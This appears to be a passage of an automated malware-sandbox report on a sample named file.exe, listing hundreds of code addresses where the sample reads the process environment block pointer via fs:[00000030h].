Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A662A0 mov eax, dword ptr fs:[00000030h] 4_2_01A662A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A662A0 mov ecx, dword ptr fs:[00000030h] 4_2_01A662A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0E284 mov eax, dword ptr fs:[00000030h] 4_2_01A0E284
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A50283 mov eax, dword ptr fs:[00000030h] 4_2_01A50283
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E02A0 mov eax, dword ptr fs:[00000030h] 4_2_019E02A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DA2C3 mov eax, dword ptr fs:[00000030h] 4_2_019DA2C3
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E02E1 mov eax, dword ptr fs:[00000030h] 4_2_019E02E1
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019C823B mov eax, dword ptr fs:[00000030h] 4_2_019C823B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D6259 mov eax, dword ptr fs:[00000030h] 4_2_019D6259
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CA250 mov eax, dword ptr fs:[00000030h] 4_2_019CA250
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A80274 mov eax, dword ptr fs:[00000030h] 4_2_01A80274
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A58243 mov eax, dword ptr fs:[00000030h] 4_2_01A58243
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A58243 mov ecx, dword ptr fs:[00000030h] 4_2_01A58243
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019C826B mov eax, dword ptr fs:[00000030h] 4_2_019C826B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A8A250 mov eax, dword ptr fs:[00000030h] 4_2_01A8A250
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D4260 mov eax, dword ptr fs:[00000030h] 4_2_019D4260
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A505A7 mov eax, dword ptr fs:[00000030h] 4_2_01A505A7
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D2582 mov eax, dword ptr fs:[00000030h] 4_2_019D2582
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D2582 mov ecx, dword ptr fs:[00000030h] 4_2_019D2582
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A04588 mov eax, dword ptr fs:[00000030h] 4_2_01A04588
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F45B1 mov eax, dword ptr fs:[00000030h] 4_2_019F45B1
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0E59C mov eax, dword ptr fs:[00000030h] 4_2_01A0E59C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D65D0 mov eax, dword ptr fs:[00000030h] 4_2_019D65D0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0C5ED mov eax, dword ptr fs:[00000030h] 4_2_01A0C5ED
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0E5CF mov eax, dword ptr fs:[00000030h] 4_2_01A0E5CF
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0A5D0 mov eax, dword ptr fs:[00000030h] 4_2_01A0A5D0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FE5E7 mov eax, dword ptr fs:[00000030h] 4_2_019FE5E7
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D25E0 mov eax, dword ptr fs:[00000030h] 4_2_019D25E0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FE53E mov eax, dword ptr fs:[00000030h] 4_2_019FE53E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FE53E mov eax, dword ptr fs:[00000030h] 4_2_019FE53E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FE53E mov eax, dword ptr fs:[00000030h] 4_2_019FE53E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FE53E mov eax, dword ptr fs:[00000030h] 4_2_019FE53E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FE53E mov eax, dword ptr fs:[00000030h] 4_2_019FE53E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A66500 mov eax, dword ptr fs:[00000030h] 4_2_01A66500
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01AA4500 mov eax, dword ptr fs:[00000030h] 4_2_01AA4500
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01AA4500 mov eax, dword ptr fs:[00000030h] 4_2_01AA4500
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01AA4500 mov eax, dword ptr fs:[00000030h] 4_2_01AA4500
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01AA4500 mov eax, dword ptr fs:[00000030h] 4_2_01AA4500
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01AA4500 mov eax, dword ptr fs:[00000030h] 4_2_01AA4500
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01AA4500 mov eax, dword ptr fs:[00000030h] 4_2_01AA4500
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01AA4500 mov eax, dword ptr fs:[00000030h] 4_2_01AA4500
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0535 mov eax, dword ptr fs:[00000030h] 4_2_019E0535
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0535 mov eax, dword ptr fs:[00000030h] 4_2_019E0535
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0535 mov eax, dword ptr fs:[00000030h] 4_2_019E0535
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0535 mov eax, dword ptr fs:[00000030h] 4_2_019E0535
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0535 mov eax, dword ptr fs:[00000030h] 4_2_019E0535
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0535 mov eax, dword ptr fs:[00000030h] 4_2_019E0535
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0656A mov eax, dword ptr fs:[00000030h] 4_2_01A0656A
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0656A mov eax, dword ptr fs:[00000030h] 4_2_01A0656A
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0656A mov eax, dword ptr fs:[00000030h] 4_2_01A0656A
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D8550 mov eax, dword ptr fs:[00000030h] 4_2_019D8550
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D8550 mov eax, dword ptr fs:[00000030h] 4_2_019D8550
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A044B0 mov ecx, dword ptr fs:[00000030h] 4_2_01A044B0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5A4B0 mov eax, dword ptr fs:[00000030h] 4_2_01A5A4B0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A8A49A mov eax, dword ptr fs:[00000030h] 4_2_01A8A49A
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D64AB mov eax, dword ptr fs:[00000030h] 4_2_019D64AB
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D04E5 mov ecx, dword ptr fs:[00000030h] 4_2_019D04E5
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A56420 mov eax, dword ptr fs:[00000030h] 4_2_01A56420
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A56420 mov eax, dword ptr fs:[00000030h] 4_2_01A56420
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A56420 mov eax, dword ptr fs:[00000030h] 4_2_01A56420
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A56420 mov eax, dword ptr fs:[00000030h] 4_2_01A56420
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A56420 mov eax, dword ptr fs:[00000030h] 4_2_01A56420
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A56420 mov eax, dword ptr fs:[00000030h] 4_2_01A56420
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A56420 mov eax, dword ptr fs:[00000030h] 4_2_01A56420
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0A430 mov eax, dword ptr fs:[00000030h] 4_2_01A0A430
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A08402 mov eax, dword ptr fs:[00000030h] 4_2_01A08402
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A08402 mov eax, dword ptr fs:[00000030h] 4_2_01A08402
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A08402 mov eax, dword ptr fs:[00000030h] 4_2_01A08402
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CC427 mov eax, dword ptr fs:[00000030h] 4_2_019CC427
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CE420 mov eax, dword ptr fs:[00000030h] 4_2_019CE420
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CE420 mov eax, dword ptr fs:[00000030h] 4_2_019CE420
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CE420 mov eax, dword ptr fs:[00000030h] 4_2_019CE420
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019C645D mov eax, dword ptr fs:[00000030h] 4_2_019C645D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F245A mov eax, dword ptr fs:[00000030h] 4_2_019F245A
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5C460 mov ecx, dword ptr fs:[00000030h] 4_2_01A5C460
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0E443 mov eax, dword ptr fs:[00000030h] 4_2_01A0E443
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0E443 mov eax, dword ptr fs:[00000030h] 4_2_01A0E443
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0E443 mov eax, dword ptr fs:[00000030h] 4_2_01A0E443
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0E443 mov eax, dword ptr fs:[00000030h] 4_2_01A0E443
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0E443 mov eax, dword ptr fs:[00000030h] 4_2_01A0E443
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0E443 mov eax, dword ptr fs:[00000030h] 4_2_01A0E443
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0E443 mov eax, dword ptr fs:[00000030h] 4_2_01A0E443
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0E443 mov eax, dword ptr fs:[00000030h] 4_2_01A0E443
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FA470 mov eax, dword ptr fs:[00000030h] 4_2_019FA470
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FA470 mov eax, dword ptr fs:[00000030h] 4_2_019FA470
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FA470 mov eax, dword ptr fs:[00000030h] 4_2_019FA470
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A8A456 mov eax, dword ptr fs:[00000030h] 4_2_01A8A456
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A847A0 mov eax, dword ptr fs:[00000030h] 4_2_01A847A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7678E mov eax, dword ptr fs:[00000030h] 4_2_01A7678E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D07AF mov eax, dword ptr fs:[00000030h] 4_2_019D07AF
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5E7E1 mov eax, dword ptr fs:[00000030h] 4_2_01A5E7E1
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DC7C0 mov eax, dword ptr fs:[00000030h] 4_2_019DC7C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A507C3 mov eax, dword ptr fs:[00000030h] 4_2_01A507C3
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D47FB mov eax, dword ptr fs:[00000030h] 4_2_019D47FB
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D47FB mov eax, dword ptr fs:[00000030h] 4_2_019D47FB
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F27ED mov eax, dword ptr fs:[00000030h] 4_2_019F27ED
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F27ED mov eax, dword ptr fs:[00000030h] 4_2_019F27ED
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F27ED mov eax, dword ptr fs:[00000030h] 4_2_019F27ED
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0C720 mov eax, dword ptr fs:[00000030h] 4_2_01A0C720
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0C720 mov eax, dword ptr fs:[00000030h] 4_2_01A0C720
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D0710 mov eax, dword ptr fs:[00000030h] 4_2_019D0710
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4C730 mov eax, dword ptr fs:[00000030h] 4_2_01A4C730
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0273C mov eax, dword ptr fs:[00000030h] 4_2_01A0273C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0273C mov ecx, dword ptr fs:[00000030h] 4_2_01A0273C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0273C mov eax, dword ptr fs:[00000030h] 4_2_01A0273C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0C700 mov eax, dword ptr fs:[00000030h] 4_2_01A0C700
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A00710 mov eax, dword ptr fs:[00000030h] 4_2_01A00710
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D0750 mov eax, dword ptr fs:[00000030h] 4_2_019D0750
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0674D mov esi, dword ptr fs:[00000030h] 4_2_01A0674D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0674D mov eax, dword ptr fs:[00000030h] 4_2_01A0674D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0674D mov eax, dword ptr fs:[00000030h] 4_2_01A0674D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D8770 mov eax, dword ptr fs:[00000030h] 4_2_019D8770
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0770 mov eax, dword ptr fs:[00000030h] 4_2_019E0770
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0770 mov eax, dword ptr fs:[00000030h] 4_2_019E0770
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0770 mov eax, dword ptr fs:[00000030h] 4_2_019E0770
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0770 mov eax, dword ptr fs:[00000030h] 4_2_019E0770
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0770 mov eax, dword ptr fs:[00000030h] 4_2_019E0770
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0770 mov eax, dword ptr fs:[00000030h] 4_2_019E0770
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0770 mov eax, dword ptr fs:[00000030h] 4_2_019E0770
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0770 mov eax, dword ptr fs:[00000030h] 4_2_019E0770
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0770 mov eax, dword ptr fs:[00000030h] 4_2_019E0770
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0770 mov eax, dword ptr fs:[00000030h] 4_2_019E0770
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0770 mov eax, dword ptr fs:[00000030h] 4_2_019E0770
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0770 mov eax, dword ptr fs:[00000030h] 4_2_019E0770
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A54755 mov eax, dword ptr fs:[00000030h] 4_2_01A54755
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12750 mov eax, dword ptr fs:[00000030h] 4_2_01A12750
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12750 mov eax, dword ptr fs:[00000030h] 4_2_01A12750
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5E75D mov eax, dword ptr fs:[00000030h] 4_2_01A5E75D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0C6A6 mov eax, dword ptr fs:[00000030h] 4_2_01A0C6A6
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D4690 mov eax, dword ptr fs:[00000030h] 4_2_019D4690
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D4690 mov eax, dword ptr fs:[00000030h] 4_2_019D4690
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A066B0 mov eax, dword ptr fs:[00000030h] 4_2_01A066B0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A506F1 mov eax, dword ptr fs:[00000030h] 4_2_01A506F1
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A506F1 mov eax, dword ptr fs:[00000030h] 4_2_01A506F1
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4E6F2 mov eax, dword ptr fs:[00000030h] 4_2_01A4E6F2
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4E6F2 mov eax, dword ptr fs:[00000030h] 4_2_01A4E6F2
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4E6F2 mov eax, dword ptr fs:[00000030h] 4_2_01A4E6F2
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4E6F2 mov eax, dword ptr fs:[00000030h] 4_2_01A4E6F2
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0A6C7 mov ebx, dword ptr fs:[00000030h] 4_2_01A0A6C7
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0A6C7 mov eax, dword ptr fs:[00000030h] 4_2_01A0A6C7
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A06620 mov eax, dword ptr fs:[00000030h] 4_2_01A06620
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A08620 mov eax, dword ptr fs:[00000030h] 4_2_01A08620
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E260B mov eax, dword ptr fs:[00000030h] 4_2_019E260B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E260B mov eax, dword ptr fs:[00000030h] 4_2_019E260B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E260B mov eax, dword ptr fs:[00000030h] 4_2_019E260B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E260B mov eax, dword ptr fs:[00000030h] 4_2_019E260B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E260B mov eax, dword ptr fs:[00000030h] 4_2_019E260B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E260B mov eax, dword ptr fs:[00000030h] 4_2_019E260B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E260B mov eax, dword ptr fs:[00000030h] 4_2_019E260B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4E609 mov eax, dword ptr fs:[00000030h] 4_2_01A4E609
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D262C mov eax, dword ptr fs:[00000030h] 4_2_019D262C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12619 mov eax, dword ptr fs:[00000030h] 4_2_01A12619
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019EE627 mov eax, dword ptr fs:[00000030h] 4_2_019EE627
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0A660 mov eax, dword ptr fs:[00000030h] 4_2_01A0A660
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0A660 mov eax, dword ptr fs:[00000030h] 4_2_01A0A660
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9866E mov eax, dword ptr fs:[00000030h] 4_2_01A9866E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9866E mov eax, dword ptr fs:[00000030h] 4_2_01A9866E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A02674 mov eax, dword ptr fs:[00000030h] 4_2_01A02674
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019EC640 mov eax, dword ptr fs:[00000030h] 4_2_019EC640
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A589B3 mov esi, dword ptr fs:[00000030h] 4_2_01A589B3
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A589B3 mov eax, dword ptr fs:[00000030h] 4_2_01A589B3
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A589B3 mov eax, dword ptr fs:[00000030h] 4_2_01A589B3
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D09AD mov eax, dword ptr fs:[00000030h] 4_2_019D09AD
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D09AD mov eax, dword ptr fs:[00000030h] 4_2_019D09AD
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E29A0 mov eax, dword ptr fs:[00000030h] 4_2_019E29A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E29A0 mov eax, dword ptr fs:[00000030h] 4_2_019E29A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E29A0 mov eax, dword ptr fs:[00000030h] 4_2_019E29A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E29A0 mov eax, dword ptr fs:[00000030h] 4_2_019E29A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E29A0 mov eax, dword ptr fs:[00000030h] 4_2_019E29A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E29A0 mov eax, dword ptr fs:[00000030h] 4_2_019E29A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E29A0 mov eax, dword ptr fs:[00000030h] 4_2_019E29A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E29A0 mov eax, dword ptr fs:[00000030h] 4_2_019E29A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E29A0 mov eax, dword ptr fs:[00000030h] 4_2_019E29A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E29A0 mov eax, dword ptr fs:[00000030h] 4_2_019E29A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E29A0 mov eax, dword ptr fs:[00000030h] 4_2_019E29A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E29A0 mov eax, dword ptr fs:[00000030h] 4_2_019E29A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E29A0 mov eax, dword ptr fs:[00000030h] 4_2_019E29A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5E9E0 mov eax, dword ptr fs:[00000030h] 4_2_01A5E9E0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DA9D0 mov eax, dword ptr fs:[00000030h] 4_2_019DA9D0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DA9D0 mov eax, dword ptr fs:[00000030h] 4_2_019DA9D0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DA9D0 mov eax, dword ptr fs:[00000030h] 4_2_019DA9D0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DA9D0 mov eax, dword ptr fs:[00000030h] 4_2_019DA9D0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DA9D0 mov eax, dword ptr fs:[00000030h] 4_2_019DA9D0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DA9D0 mov eax, dword ptr fs:[00000030h] 4_2_019DA9D0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A029F9 mov eax, dword ptr fs:[00000030h] 4_2_01A029F9
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A029F9 mov eax, dword ptr fs:[00000030h] 4_2_01A029F9
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A669C0 mov eax, dword ptr fs:[00000030h] 4_2_01A669C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A049D0 mov eax, dword ptr fs:[00000030h] 4_2_01A049D0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9A9D3 mov eax, dword ptr fs:[00000030h] 4_2_01A9A9D3
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019C8918 mov eax, dword ptr fs:[00000030h] 4_2_019C8918
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019C8918 mov eax, dword ptr fs:[00000030h] 4_2_019C8918
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A6892B mov eax, dword ptr fs:[00000030h] 4_2_01A6892B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5892A mov eax, dword ptr fs:[00000030h] 4_2_01A5892A
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4E908 mov eax, dword ptr fs:[00000030h] 4_2_01A4E908
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4E908 mov eax, dword ptr fs:[00000030h] 4_2_01A4E908
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5C912 mov eax, dword ptr fs:[00000030h] 4_2_01A5C912
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A1096E mov eax, dword ptr fs:[00000030h] 4_2_01A1096E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A1096E mov edx, dword ptr fs:[00000030h] 4_2_01A1096E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A1096E mov eax, dword ptr fs:[00000030h] 4_2_01A1096E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5C97C mov eax, dword ptr fs:[00000030h] 4_2_01A5C97C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A74978 mov eax, dword ptr fs:[00000030h] 4_2_01A74978
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A74978 mov eax, dword ptr fs:[00000030h] 4_2_01A74978
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A50946 mov eax, dword ptr fs:[00000030h] 4_2_01A50946
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F6962 mov eax, dword ptr fs:[00000030h] 4_2_019F6962
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F6962 mov eax, dword ptr fs:[00000030h] 4_2_019F6962
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F6962 mov eax, dword ptr fs:[00000030h] 4_2_019F6962
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D0887 mov eax, dword ptr fs:[00000030h] 4_2_019D0887
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5C89D mov eax, dword ptr fs:[00000030h] 4_2_01A5C89D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9A8E4 mov eax, dword ptr fs:[00000030h] 4_2_01A9A8E4
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0C8F9 mov eax, dword ptr fs:[00000030h] 4_2_01A0C8F9
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0C8F9 mov eax, dword ptr fs:[00000030h] 4_2_01A0C8F9
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FE8C0 mov eax, dword ptr fs:[00000030h] 4_2_019FE8C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0A830 mov eax, dword ptr fs:[00000030h] 4_2_01A0A830
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7483A mov eax, dword ptr fs:[00000030h] 4_2_01A7483A
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7483A mov eax, dword ptr fs:[00000030h] 4_2_01A7483A
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F2835 mov eax, dword ptr fs:[00000030h] 4_2_019F2835
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F2835 mov eax, dword ptr fs:[00000030h] 4_2_019F2835
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F2835 mov eax, dword ptr fs:[00000030h] 4_2_019F2835
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F2835 mov ecx, dword ptr fs:[00000030h] 4_2_019F2835
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F2835 mov eax, dword ptr fs:[00000030h] 4_2_019F2835
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F2835 mov eax, dword ptr fs:[00000030h] 4_2_019F2835
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5C810 mov eax, dword ptr fs:[00000030h] 4_2_01A5C810
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D4859 mov eax, dword ptr fs:[00000030h] 4_2_019D4859
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D4859 mov eax, dword ptr fs:[00000030h] 4_2_019D4859
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A66870 mov eax, dword ptr fs:[00000030h] 4_2_01A66870
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A66870 mov eax, dword ptr fs:[00000030h] 4_2_01A66870
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5E872 mov eax, dword ptr fs:[00000030h] 4_2_01A5E872
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5E872 mov eax, dword ptr fs:[00000030h] 4_2_01A5E872
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E2840 mov ecx, dword ptr fs:[00000030h] 4_2_019E2840
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A00854 mov eax, dword ptr fs:[00000030h] 4_2_01A00854
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A84BB0 mov eax, dword ptr fs:[00000030h] 4_2_01A84BB0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A84BB0 mov eax, dword ptr fs:[00000030h] 4_2_01A84BB0
